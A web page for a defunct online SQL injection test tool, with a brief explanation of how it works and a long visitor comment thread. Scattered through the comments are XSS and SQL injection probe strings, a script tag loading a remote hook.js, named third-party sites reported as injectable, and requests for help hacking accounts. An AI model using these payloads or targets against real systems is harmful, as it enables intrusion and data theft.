zubrag.com
Free php and cpanel scripts to automate your daily routine

Online Tools :: SQL Injection Vulnerability Test

SQL injection is a technique that exploits a security vulnerability occurring in the database layer of an application. Mostly user input is not filtered by the script, is then passed into a SQL statement.

SQL injection test tool was created for beginner webmasters. The tool will perform simple test to check whether a webpage is vulnerable to SQL injection. It cannot determine vulnerability for sure, but will at least try.

Parameters
The tool expects an URL with parameters, like this:
http://www.example.com/articles/article.php?id=123&topic=injection

It will not work if URL does not contain parameters. For example tool will not be able to check following URL:
http://www.example.com/articles/article.php

How SQL Injection Test works
Script does parse URL provided, and modifies parameters to simulate simple SQL injection (adds double and single quotes). If resulting page contains error message generated by database management system (like MySQL, MSSQL, etc.) then script is most likely vulnerable to SQL injection. In this case SQL Injection Test tool will produce a warning.

Sorry, SQL Injection Test is not available. Check back in few days

Download free Netsparker SQL Injection Scanner and find SQL Injection risks in your websites within seconds.



You might be interested in other online tools.

Comments

Webmaster
October 5, 2007
Please add vulnerability scan for mod-rewrited urls.
johan [anti-spam] tagor.net
November 4, 2007
What should I do to clean up the warning of "Database error detected. The webpage is either vulnerable to SQL injection, or user input is not correctly sanitized."
I don't mind to pay for the service.
Cheers.
Havrekex
November 6, 2007
Seems to say database error on everything I throw at it
November 7, 2007
Yes it sure does always send a fear monger message, in fact the author of this site might what to check their own pages as they report the same issue every other site does :-)

Admin: Fixed. Newly added error detection pattern was causing this. Thank you for posting!
me [anti-spam] dash.za.net
December 2, 2007
hey,

Nice...I am currently working on something very similar, except it crawls the whole site and injects every GET parameter found in page links.

I would really appreciate it if you would please mail me some of your string signatures that you use to detect sql injection, currently all I'm looking for is "unclosed quotation mark".

Thanks a lot.
DASH
December 14, 2007
Hi...
I have a question. I have read papers on AMNESIA, SQLDOM...do they come under automated tools to detect SQL injection?
It will be great if someone can answer my question. Thank you!
Richard
December 26, 2007
Nice work,
I use it to test my site
January 4, 2008
Doesn't work for me...
February 12, 2008
Everytime i check the link displays result as "Test did not reveal SQL injection vulnerability."
February 19, 2008
<script>alert("xss");</script>
BlzOfHk
March 25, 2008
Doesn't work for me too , but thank u anyway
hi
May 21, 2008
Author please check it once before u say others!!
newkaiza [anti-spam] web.de
June 13, 2008
Hello great tool,
is that possible that i can get the sources ?
June 21, 2008
The site fails to pic up some preaty major inj that are common knowlage to most "internet" people
October 4, 2008
öhm... lol
i know why i prefer to check sites manual.

tried 4 sites which has definitely a valnurability. But this check said: "Test did not reveal SQL injection vulnerability."
October 7, 2008
deffinetly have some problems with this test, just had a recent attack on my website from sql injection and it cones up negative
November 13, 2008
It doesn't catch all the SQL Injection bugs
d.rutmann [anti-spam] adanetmail.com
December 22, 2008
I recommend a service call GamaSec ( www.gamasec.com) remote online web vulnerability-assessment service
that tests web servers, web-interfaced systems and web-based applications against thousands
of known vulnerabilities with dynamic testing, and by simulating web-application attacks during
online scanning. The service identifies security vulnerabilities and produces recommended
solutions that can fix, or provide a viable workaround to the identified vulnerabilities
Sumeet
January 24, 2009
LOL
Your antispam protection is quite easy to break.Why not use a captcha ???

BTW Thanks for the tool.My site was vulnerable.Just fixed it :)
cowpus
February 14, 2009
no workie
and with a script that is *known* to be vulnerable
hmm...
February 25, 2009
You should add what exactly the scanner did. What tables it injected and etc..
saira
February 27, 2009
hi
i want to know one think when i enter the URL of my application that i need to be test i got time out message.now wot can i do plz help me out.
ketek90 [anti-spam] gmail.com
March 19, 2009
hi guys,,, great tools... btw you can try out this too,, tools.kerinci.net/?x=injector
April 17, 2009
http://www.zubrag.com/tools/sql-injection-test.php
WARNING! Database error detected. The webpage is either vulnerable to SQL injection, or user input is not correctly sanitized.
URL tested: http://www.zubrag.com/tools/sql-injection-test.php
April 17, 2009
Instructions say: It will not work if URL does not contain parameters.
The url you tested does not expect parameters, so the result is unexpected
April 28, 2009
Test did not reveal SQL injection vulnerability.
joe2owl [anti-spam] yahoo.com
May 21, 2009
Try to use fuzzers to find SQL Injection vulnerabilities. I recommend Powerfuzzer http://www.powerfuzzer.com. It can find SQL Injection in Microsoft SQL Server, MySQL, Postgres and IBM DB2.
thenin
June 12, 2009
exactly
WARNING! Database error detected. The webpage is either vulnerable to SQL injection, or user input is not correctly sanitized.
URL tested: http://www.zubrag.com/tools/sql-injection-test.php


You might be interested in other online tools.
Comments
shafiq
June 12, 2009
hello i am shaiq from Mirpur Azd Kashmir Pakistan.. kindly tell me wot kind of bug pro grammars did during code..? which a hacker can easily access to database..
June 23, 2009
This doesn't work at all. I tested a site that I KNEW had an SQL injection vulnerability. And it didn't work.
July 2, 2009
Nice to have multiple opinions.

Error based and blind available here - http://www.hackertarget.com/
iceblitz
July 13, 2009
ok this doesn't work i used it to test this site: http://mahavardaan.biz/ and I managed to sql it!! this sucks.
support [anti-spam] giftstobangalore.com
August 2, 2009
facing huge problem.
Shah
August 4, 2009
Encountered an error while testing the Website "Could not perform SQL injection vulnerability test. Error: Operation timed out (60)
"
SUCkers
August 8, 2009
Suck Scripts ...Sorry but we need good scripts
sachin [anti-spam] gmail.com
August 30, 2009
THIS SITE IS FAKE SO PLEASE DONT USE THIS BLOODY SITE
August 30, 2009
Hey Sachin... this is an excellent site.. please do not spam here
September 27, 2009
I put links that I have already found to be injectable. This program said "Test did not reveal SQL injection vulnerability.". This site is fake. This site does not work. Don't use this site.
James
October 7, 2009
This tool is not working for me....
Mohammad
October 9, 2009
this isn't any working
Kool tricky
October 11, 2009
hey dude now SQL Tools are work in case bcoz the every buddy know about sQL injecton and all company block the SQL injection now
capiroto
October 20, 2009
<script>alert('test XSS')</script>
didier
October 25, 2009
GamaSec identifies application vulnerabilities ( e.g. Cross Site Scripting (XSS), SQL injection, Code Inclusion etc.. ) as well as site exposure risk, ranks threat priority, produces highly graphical, intuitive HTML reports, and indicates site security posture by vulnerabilities and threat exposure. www.gamasec.com
acil_arya [anti-spam] yahoo.com
November 7, 2009
why can't i create an account on this site??

http://darknessmu.org/index.php?op=register

i keep creating but i can't
it keep saying
SQL injection detected, but i followed the instructions to use only letters (a-Z) and numbers (0-9) at account and password!
please mail me if you have a suggestion about this.
ahsan2499 [anti-spam] yahoo.com
November 25, 2009
Without logging in how a website could be checked for SQL injection.
sbl.listed [anti-spam] gmail.com
November 27, 2009
I will proteckting from any spam
shafiq
December 8, 2009
aol.shafiq @ gmail.com

good scripts www.ksecurity-team.com
December 17, 2009
it do not works
</div></br> <script> Alert("hello"); </script> john [anti-spam] gmail.com
December 31, 2009
amazing
the jack
December 31, 2009
http://www.bmwtours.com/address/address_book.php?start=100
i have login with user:test password:test
& manual SQLi this site was Vulrnble, but your tools doesn't knows...
please fix that. thx
Martin
January 4, 2010
didn't seem to work even against sites I know for a fact to be vulnerable to SQL injection. I just pointed to the base url not to the absolute path of the .asp file which contains the vulnerability, maybe that's the issue.
Martin
January 4, 2010
nope, still didn't work and I fed it the absolute path http://www.efwma.org/99510102134744143/blank/browse.asp?a=383&BMDRN=2000&BCOB=0&c=52654&DROP%20TABLE%20ALL you can pass whatever you want to the c paramater as its not sanitized at all. Me thinks this thing is BS
reid.zuckerman [anti-spam] comcast.net
January 14, 2010
Hi, im trying to get simple passwords like facebook, myspace, email and others. It says that there is no SQL Vulnerablility, but is there any other way I can get someone's password on.. lets say facebook?
s70rm [anti-spam] hotmail.com
January 17, 2010
have an irani sql injector ... the best at ever .. contact me s70rm@hotmail.com North Storm Team
March 3, 2010
<script>alert('xsss')</script>
udeme44 [anti-spam] gmail.com
March 6, 2010
i need sql injection and codes on how to use it and also how to hack database. email me if you got some "udeme44@gmail.com"
ryan
March 7, 2010
hi i wanna learn how to hack a mobile site can anyone help me?
Ajay
March 11, 2010
Not working
Torok
March 17, 2010
web torok gatel asu
usman
March 23, 2010
thank you !!! its very useful for me
April 5, 2010
grazie, ottimo script!!

Il test funziona solo se chiamate una variabile via url come http://dominio.com/index.php?var=abc

non il dominio principale del sito http://www.zubrag.com (non funziona)
April 19, 2010
I tested my site and it is perfect I got a "Test did not reveal SQL injection vulnerability" msg so I am good to go
aku bukan hacker
May 5, 2010
situse ura jelas bgt kie masa bahasa inggris kabeh ura ana sing bahasa jawa
May 17, 2010
<script>alert("xss");</script>
May 27, 2010
WebCruiser - Web Vulnerability Scanner, a compact but powerful web security scanning tool that will aid you in auditing your site! It has a Vulnerability Scanner and a series of security tools. It can support scanning website as well as POC( Prooving of concept) for web vulnerabilities: SQL Injection, Cross Site Scripting, XPath Injection etc. So, WebCruiser is also an automatic SQL injection tool, a XPath injection tool, and a Cross Site Scripting tool!
progtel2004 [anti-spam] yahoo.com
June 23, 2010
Iyo rek... kampret iki... Go nge-test websites sing wis mari tak jebol, jelas2 bolong ae ora iso nemok ne...
Jebule Asem tenang tibakne...
( C4k N4th4n )
gfd [anti-spam] trer.com
June 24, 2010
dfsdf dsf
pekelhc [anti-spam] live.nl
June 26, 2010
:)::)
contact [anti-spam] sharpgamer.com
July 7, 2010
I am scared, I got warning!

I know nothing about security, I better be reading about it...
July 9, 2010
I have used some tutorials for sql injection. but i cannot get a good understand from them. please help me...
rojo_edhan
July 22, 2010
stupid web\\\
rajashekhar30 [anti-spam] gmail.com
August 20, 2010
i want to apply sql injection on one site. could u please suggest me how can i do this.I do not have any prior knowledge
mistermateriaxp [anti-spam] hotmail.com
August 23, 2010
Ey guys i have a cuestion 4 u.

i want put in my web page this one
http://internet-kfeml.jimdo.com/vota-por-ella/

a code where any user dont have to put the criteria "Jimenita Monteros" and where the user can vote too, at this time show the buttons as the web page shows:

http://www.kinder.com.gt/index.php?option=com_wrapper&view=wrapper&Itemid=81
(here u have to put "Jimenita Monteros")

so when in this page u put ur criteria the frame will show only Jimenita Monteros, so the address http doesnt change....so, how could i get this frame with its buttons for the ppl wants to vote can do trought my web page?....without put the criteria "Jimenita Monteros" ??? help me plz....

my email is mistermateriaxp@hotmail.com
null
September 1, 2010
Do your own tests, skids!!!
sconscious [anti-spam] rocketmail.com
December 28, 2010
I need sql injection and codes on how to use it and also how to hack database. email me if you got some "
sconscious [anti-spam] rocketmail.com
December 28, 2010
I need sql injection and codes on how to use it and also how to hack database. email me if you got some " sconscious@rocketmail.com
sh.humble [anti-spam] gmail.com
January 26, 2011
I could not see the example of SQL Injection Test since it's not available. Can you post again so that we can learn how the injection happens and take some precaution.
February 14, 2011
Can you please help me to get few site url: to test sql injection vulnerability . I need to give a seminar on tht . Culd u please help .
hackersteam.net
July 5, 2011
where is the tool??
guggitanvi [anti-spam] yahoo.com
December 29, 2011
Check this helpful link too...
http://mindstick.com/Articles/a7279c4f-4768-4ef6-8fdc-25e51e1c10dc/?SQL%20Injection%20Attacks

Thanks
March 3, 2012
Watch a short video about Top 10 vulnerable applications on your network:
http://rocketviews.com/watch?416aO901fuUagic
<script>
June 7, 2012
<script>
September 10, 2012
This is all rubbish. You can take down your tool why?
sep12 [anti-spam] rematedejuguetes.com
September 28, 2012
Could it be possible to have two different results using the same url and variables? My site has.

<a href="http://www.rematedejuguetes.com">Juguetes</a>
June 28, 2013
hmmm
hi' or 1=1--
October 7, 2013
hmm
December 3, 2013
<script>alert("xss");</script>
May 12, 2014
</pre><script>alert(1);</script><pre>
May 12, 2014
</div><script>alert(1);</script><div>
sarasamani46 [anti-spam] gmail.com
December 13, 2014
in the name of god
the sql injection test online site
davala
September 9, 2015
" </div><script>alert(1);</script><div>
September 9, 2015
sqli test
vazindel.nooshin [anti-spam] gmail.com
December 12, 2015
hi
please send me how to use pixy for static analyse web page beacuse i save it but i dont know how to use it
'
February 27, 2016
'
test2 [anti-spam] g.com
July 9, 2016
test
leooo.fgggg [anti-spam] gmail.com
August 12, 2016
<script>alert("TEST");</script>
<script>alert("TEST");</script>
September 27, 2016
wer
fgasdf [anti-spam] gmail.com
September 29, 2016
select * from table;
mansi [anti-spam] web4me.in
December 5, 2016
<script>alert('HAcked By Raj');</script>
July 15, 2017
<script>alert("xss");</script>
September 29, 2017
<script src="http://192.168.1.5:3000/hook.js"></script>
September 29, 2017
<script src="http://192.168.1.5:3000/hook.js">alert("WTF")</script>
January 17, 2018
<script>alert("TEST");</script>
<vipin oncopy = prompt(document.domain)>
February 6, 2018
<vipin oncopy = prompt(document.domain)>
February 6, 2018
"onmouseover=alert(1)//
" or ""="
February 23, 2018
" or ""="
mobileogram.com [anti-spam] gmail.com
January 11, 2019
https://www.mobileogram.com kindly review me about this design and security
zdamps [anti-spam] emailna.co
September 7, 2019
zdzdzefefezfzefezf